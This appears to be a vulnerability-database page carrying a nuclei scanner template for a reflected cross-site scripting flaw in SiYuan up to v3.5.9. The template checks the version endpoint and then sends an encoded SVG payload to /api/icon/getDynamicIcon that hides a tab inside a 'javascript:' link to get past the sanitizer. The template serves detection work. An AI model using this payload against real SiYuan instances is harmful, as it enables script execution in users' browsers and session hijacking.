Lucene search
K

SiYuan <= v3.5.9 - Cross Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

SiYuan cross site scripting via javascript: href in SVG allows unauthenticated execution.

Related
Refs
Code
id: CVE-2026-31809

info:
  name: SiYuan <= v3.5.9 - Cross Site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
   SiYuan v3.5.10 contains a reflected XSS caused by improper sanitization of javascript: href attributes allowing ASCII control characters to bypass prefix checks in SVG sanitizer, letting unauthenticated attackers execute JavaScript via /api/icon/getDynamicIcon.
  impact: |
   Unauthenticated attackers can execute arbitrary JavaScript in users' browsers, leading to session hijacking or other client-side attacks.
  remediation: |
   Update to version 3.5.10 or later.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-pmc9-f5qr-2pcr
    - https://nvd.nist.gov/vuln/detail/CVE-2026-31809
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-31809
    epss-score: 0.00505
    epss-percentile: 0.39528
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: siyuan-note
    product: siyuan
    shodan-query: http.favicon.hash:-1450125239
  tags: cve,cve2026,siyuan,xss,bypass

flow: http(1) && http(2)

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/system/version"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'compare_versions(ver, ">= 0.0.1", "<= 3.5.9")'
        condition: and
        internal: true

    extractors:
      - type: json
        name: ver
        json:
          - '.data'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/api/icon/getDynamicIcon?type=8&content=%3C%2Ftext%3E%3Ca+href%3D%22java%26%239%3Bscript%3Aalert%28document.domain%29%22%3E%3Ctext+x%3D%2250%25%22+y%3D%2280%25%22+fill%3D%22red%22+style%3D%22font-size%3A60px%22%3EClick+me%3C%2Ftext%3E%3C%2Fa%3E%3Ctext%3E&color=blue"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<a href="java&#9;script:alert(document.domain)">'
          - 'id="dynamic_icon_type8'
        condition: and

      - type: word
        part: content_type
        words:
          - "image/svg+xml"

      - type: status
        status:
          - 200
# digest: 490a00463044022076d044b7e13b16446cb827a2833ddc87c397cb925c26f85a96d5dd6794f3a14e02207fe90ce7c8594784f40ab9361d00bdf962d521370b06c43c31f5c44691c40892:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2026 17:11Current
7.2High risk
Vulners AI Score7.2
CVSS 3.16.1
CVSS 46.4
EPSS0.00505
SSVC
5